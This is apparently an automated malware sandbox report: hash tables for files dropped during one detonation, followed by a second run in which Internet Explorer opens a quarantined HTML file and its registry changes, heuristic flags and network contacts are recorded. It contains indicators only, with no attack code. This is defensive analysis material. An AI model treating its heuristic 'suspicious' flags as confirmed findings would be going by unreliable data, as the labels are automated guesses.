memory/4508-11-0x00007FF9526A0000-0x00007FF953161000-memory.dmp
memory/4508-12-0x00007FF9526A0000-0x00007FF953161000-memory.dmp
memory/4508-15-0x00007FF9526A0000-0x00007FF953161000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | acbae3a20017316bcc01b2f407be68e7 |
| SHA1 | 3ae35ab773fcbcd982ffcc909ad4e8aa1a3a29fb |
| SHA256 | fb4454cf124dcf8edf65a40b0bec05b653a57b5166cfd4aedb2ff1d49b12ca3d |
| SHA512 | b62f4419ab16fdb0a5fc22bc0eb6fa0745c9135d4b450c595e948da793e8cbf0f3defacf59c733d56309d412eaf2fc020c452efe40c9a1f632f28f241101f5dc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e5bfec1063a497048fffb231a0621403 |
| SHA1 | 97cf6a89f237f43b9c22e3e081f7d45924d435ba |
| SHA256 | 325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f |
| SHA512 | e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e |
C:\Temp\DWmIMSN8O.hta
| MD5 | 16d76e35baeb05bc069a12dce9da83f9 |
| SHA1 | f419fd74265369666595c7ce7823ef75b40b2768 |
| SHA256 | 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7 |
| SHA512 | 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1f0f8c49b22409ca78499f5df1ce9456 |
| SHA1 | 5300f7ed636959c8c8366418e891dbe49a3edba9 |
| SHA256 | 429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014 |
| SHA512 | ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af |
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
| MD5 | a92d6465d69430b38cbc16bf1c6a7210 |
| SHA1 | 421fadebee484c9d19b9cb18faf3b0f5d9b7a554 |
| SHA256 | 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77 |
| SHA512 | 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345 |
C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
| MD5 | 4871c39a4a7c16a4547820b8c749a32c |
| SHA1 | 09728bba8d55355e9434305941e14403a8e1ca63 |
| SHA256 | 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453 |
| SHA512 | 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec |
memory/3900-89-0x00000000001B0000-0x00000000001DC000-memory.dmp
memory/3900-90-0x0000000005050000-0x00000000055F4000-memory.dmp
memory/3604-92-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-94-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-101-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-103-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-108-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-109-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-112-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
| MD5 | 21cbf1c19605fa8a2dc9cd40990139ca |
| SHA1 | a2c2c891b7f156bbf46428889cec083a4ae1b94c |
| SHA256 | 2bed46c8233ce24e911ae5264ffd59ec0932e711c2e5ba8d4171d34684d156ac |
| SHA512 | 43fe77ca93a34fdab17e508933c5476b149103320cce0abd44ea5bbe7ab91eec9990c3fce591f0ccd677b375ca74225e45d27638e5459e949cd18d78a61e3e00 |
memory/1232-127-0x00000000008E0000-0x0000000000BE9000-memory.dmp
memory/3604-131-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-132-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-136-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-137-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-141-0x0000000000400000-0x0000000000429000-memory.dmp
\??\pipe\crashpad_864_AQGFMUPYXXQOLAOY
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1232-172-0x00000000008E0000-0x0000000000BE9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe
| MD5 | 2f78a06ed676b813f5e094010267b7aa |
| SHA1 | 9a418672d952366730a9f3e83b5edb99fc9e80c7 |
| SHA256 | b3b2da11dbc333ed093b8507bb6f2d513782505588a26cc9a3d6f9e5bb74f5f8 |
| SHA512 | 2a32f04f7c8a034b539659fde4faabdef7fd2e6032785585c40f9f95253c220c86b58388a1cc79d2ad7622157d26dd23c198a62311bec3fa0227119b913c354a |
memory/1808-188-0x0000000000B60000-0x000000000100A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\b41fabab-80a8-4013-b09a-ac0ae292b8fc.tmp
| MD5 | eae462c55eba847a1a8b58e58976b253 |
| SHA1 | 4d7c9d59d6ae64eb852bd60b48c161125c820673 |
| SHA256 | ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad |
| SHA512 | 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir864_1950574921\CRX_INSTALL\_locales\en_CA\messages.json
| MD5 | 558659936250e03cc14b60ebf648aa09 |
| SHA1 | 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825 |
| SHA256 | 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b |
| SHA512 | 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
| MD5 | 4ec1df2da46182103d2ffc3b92d20ca5 |
| SHA1 | fb9d1ba3710cf31a87165317c6edc110e98994ce |
| SHA256 | 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6 |
| SHA512 | 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 05a83e0b8404b63b0bb32816a9af7de0 |
| SHA1 | e79d9237b5fadfa394f4020955d0dc1b75b77cf1 |
| SHA256 | bd3f9e321bf68ba87d22995e192302c00e14a0e969d43f8f7d670ecdf510c88c |
| SHA512 | 0dacceb01f96c317757c95a182114700e15e9e40892e7260be3d026b58757e6f21a89f41471c647c698a81e894df9a0ae64a026b675421177ab762ab428cda42 |
memory/3604-583-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-584-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3604-585-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe
| MD5 | 60dd2030e1ff1f9a3406ddc438893694 |
| SHA1 | b01f2c39b1046bc892c9db78898e1c063b21836f |
| SHA256 | d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee |
| SHA512 | 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246 |
memory/1808-593-0x0000000000B60000-0x000000000100A000-memory.dmp
memory/3604-594-0x0000000000400000-0x0000000000429000-memory.dmp
memory/5240-605-0x0000000000BD0000-0x0000000000C2C000-memory.dmp
memory/5128-608-0x0000000000400000-0x000000000045E000-memory.dmp
memory/5128-610-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fffde59525dd5af902ac449748484b15 |
| SHA1 | 243968c68b819f03d15b48fc92029bf11e21bedc |
| SHA256 | 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762 |
| SHA512 | f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5a4ba937-4697-4a8b-b715-4d8850a08764.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ab283f88362e9716dd5c324319272528 |
| SHA1 | 84cebc7951a84d497b2c1017095c2c572e3648c4 |
| SHA256 | 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2 |
| SHA512 | 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 06eb83ab313d92546cc14b4c004dd873 |
| SHA1 | 46db5e1788fd7a9fb968ff8d24897c9ac8dad53d |
| SHA256 | c9d65c77c4843b9398c8b6e12417292f8e70c9d7864d39ec912814005c90489f |
| SHA512 | ca598d6ea0c63c7f0ff5a0ae7db3e1807ac34a03b60cba1699aa29bc0ebfaeed8803ecc41e624e2c4fa58f9515a8a90a15608be503023797cc1ebebe1c6353fd |
Analysis: behavioral18
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20241023-en
Max time kernel
121s
Max time network
128s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c087871aa688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4608EB51-F499-11EF-8504-C668CEC02771} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000353befe9fe459eb6317b2bc18fad24530b71f8c61b6dfca373a1f275a386f8f9000000000e8000000002000020000000015c01c04859f21174936f41820bdf6a8344a1743f5541c9576b3b8c42f75f722000000080aadfaafa428162cd31eefe0fc6c460f58ac2543bc38f6ff369135df70e7a4f4000000072c8df2cb7070c7b932cdb8b45ed0d43877d393ba67448f17e2430e4b2b15faa049bcdb3207868f1560884cfba81608911a49353c24d70cd8f8f0b4642226bc2 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000c5dac03c203ccee110a439b991ff01b906b4cdbdd035cca6a2e2ce19e6efd9cb000000000e800000000200002000000036458c6e2d04c28a5eddbb66caa65b9d365df9c5f228f111ce2ec0464a2a4a26900000003e81cdf1a0cadd54a14459cae34de048e66381f68c239c5ad76d9ddea53bd58a67962f5f1ffa417a2a6194d1c08d4110c0af6627c562499accc4112a7aff37d8b88fdb1c91f3b02f6fae73f6b3e1d60b9b00da24d7be17071928752b618cfac998ff5e3884ba3400d57148d736c277fb3423cee7b7d8cceb21b5efd6ff4db5cfaf61830ae22c36f93c20fc5bbd5fbbf6400000001c27e7cd91793376bd956d79baf626313f27652fd7b1c30771e49ebb3ca6b07cc7173a88ec97746ae74eb314b81d837b6fdcc4268b66842c25a43aaf780d090d | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1388 wrote to memory of 2536 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabCCC4.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarCDE4.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6ef4e09c1ddb79e303cf87cb90a92ac3 |
| SHA1 | 0f7077b485832147a63fa6150ec8e8bda0f65cec |
| SHA256 | 76ce657de7a15759e0417ece1c34d011804296a641a6c487623cdcead14c2dde |
| SHA512 | a3c2da65160b7515683c5caab9fdb3424da8f603d9c1c687cbfb59ddd98cb3a8db1161f27cbc9448033896db9f4f5a45fd497459023872cc25640132bb0e079e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | faa9fb81293de466580c675ff1298d06 |
| SHA1 | 2ebab92d6fb9ff6349349f9defd0a9fe6aa2b72e |
| SHA256 | ff61b2c6e12913b7702efba9711207820838174564089a7bd165c13375de3a6d |
| SHA512 | 332038224dffdd75aa48b4803b2a4f14040b439b0722df514aa3a062733511d868ed98c0993339dc34bf53f90c19641568834cbb96d4969b96d11229fe3e83a8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3e59b908918921d569a0119cf2a5b578 |
| SHA1 | 1d7c2a8a8b42a23ab6bd3915ca6e4e81189f5f91 |
| SHA256 | 71a2aaac1b8c2cab6f863b66f05d288beff24554343e880db16598168040a196 |
| SHA512 | 6c6c516079fcaba98e69126f977db367bd438546c976b3ac04f37e4f3aaf38c544856dcc02d0e48ae46dc2b5f82be63bb52a61df113751ee9ea8557ec3470f19 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | dbb54151e5b462eb37623efddde78923 |
| SHA1 | 5093a8f56bae304fb90445fbf9be292610539ef3 |
| SHA256 | c82cf70a392ca8bbb00bdb087b73610e90a84fbaa21eb537cab53e3a396e9137 |
| SHA512 | 0a0cceac85daa2dbcd7d6e38f4befb839897aed53a25855297afc14c2dcf803d7b709cf8022729728a97708df0b64f34c4fa83e6136fb6615f00691afb8d83f8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 90bc690cc74cfff8180af159e966bca4 |
| SHA1 | 9f099b20a5e21aba50bc7c8c7dc79ae18b20f821 |
| SHA256 | 2d2fe0b2948edceaf14a8f7b254c4b133c976cf9300e4a22a4b18751be79f6f5 |
| SHA512 | 6eb992c7f57dc65fe52162021a43a611e99cee0f27102bd5c1fb6fbd2200cc6b9af65ed452446ba011b666de116d3463117540b308567040d60755145a4b8a54 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 076432608f94a37468386061e35132e9 |
| SHA1 | 772a08db2cbf191df1f4b08a6f233656262655ce |
| SHA256 | 6fdc30af504c54e2296df8369b32dfe2593cf6afbd603d86bfc8ffd317052547 |
| SHA512 | 57c2b9af5c4f1ced88fbeda38740c48543afbc4a5d4e5f187930d30e2d5e9c1341dc1081184179edc071ee300bbc0401c878a3f5bdd4f21767d4a7927145ef84 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4199804d4c899f5802ac7d141fd09db8 |
| SHA1 | 40fb940dcf6ebd7a580b751cb630420842b7cc9b |
| SHA256 | c40487f4170352a7ca477b4cd9ef6e8aef7307e9b6abb6d6e1e450c8e535a18a |
| SHA512 | f0cef39f87e0f8eb3b0de80302128a3f152a7bbca456e9b8d03690f8f0e1902598268c1e04dd42b35cb3c72b497b40cfb322652d071f0bfdf39fba9c661084d8 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1530ce84bec874bc5988ceaf348f4d73 |
| SHA1 | a966d23f1f9d84e29abd4a8385680b62fa464973 |
| SHA256 | b9deee0c6891611942a44d2578ba8f97c6bb6f53060990d5de2c5a1d25928cda |
